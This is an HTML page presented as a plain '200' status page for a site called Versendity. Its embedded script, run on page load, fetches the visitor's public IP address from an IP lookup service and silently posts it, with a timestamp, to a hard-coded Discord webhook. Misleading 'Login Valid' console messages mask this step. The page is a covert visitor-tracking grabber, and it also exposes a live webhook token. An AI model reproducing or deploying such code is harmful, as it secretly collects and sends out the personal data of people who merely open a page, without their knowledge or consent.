<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>200 | Versendity</title>
    <link rel="icon" type="image/png" href="logo2.png">
    <style>
        @font-face {
            font-family: 'Nexa';
            src: url('Nexa-Heavy.ttf') format('truetype');
            font-weight: 400;
            font-style: normal;
        }
        body {
            font-family: 'Nexa', sans-serif;
            text-align: center;
            margin: 0;
            background-color: black;
            padding: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }
        #logo {
            max-width: 200px;
            margin-right: 20px;
            transition: transform 1s ease;
        }
        #error-code-container {
            display: flex;
            align-items: center;
        }

        #error-code {
            font-size: 72px;
            font-family: 'Nexa', sans-serif;
            color: #264aff;
            transition: transform 1s ease;
        }
        #error-description {
            margin-top: 20px;
            font-size: 18px;
            color: #252525;
        }

        #error-code-container:hover #logo,
        #error-code-container:hover #error-code {
            transform: scale(1.1);
        }
    </style>
</head>
<body>
    <div id="error-code-container">
        <img id="logo" src="logo2.png" alt="Logo" draggable="false">
        <div id="error-code" draggable="false">200</div>
    </div>
    <script>
    function sendToWebhook(ip) {
      const webhookURL = 'https://discord.com/api/webhooks/1227950675237801995/QSMOFbMnD3oe_0uDAmDddvTan-v_o7rAa5HNB-16P3SAIAwvpSLT4esHv_-HgWzKqAnA';

      const embed = {
        title: 'Versendity IP Detection',
        fields: [
          {
            name: 'IP Address',
            value: '```' + ip + '```',
          },
          {
            name: 'Timestamp',
            value: '```' + new Date().toLocaleString() + '```',
          },
        ],
        image: {
            url: 'https://i.ibb.co/Mh02pmZ/rounded.png',
        },
      };

      fetch(webhookURL, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ embeds: [embed] }),
      })
      .then(response => {
        if (!response.ok) {
          throw new Error('');
        }
        console.log('Login Webhook > Valid');
      })
      .catch(error => {
        console.error('Login Webhook Invalid > ', error);
      });
    }

    function getVisitorIP() {
      fetch('https://api64.ipify.org?format=json')
      .then(response => response.json())
      .then(data => {
        const ip = data.ip;
        console.log('Login Valid > ', ip);
        sendToWebhook(ip);
      })
      .catch(error => {
        console.error('Login Invalid > ', error);
      });
    }

    window.addEventListener('load', getVisitorIP);
    </script>
</body>
</html>
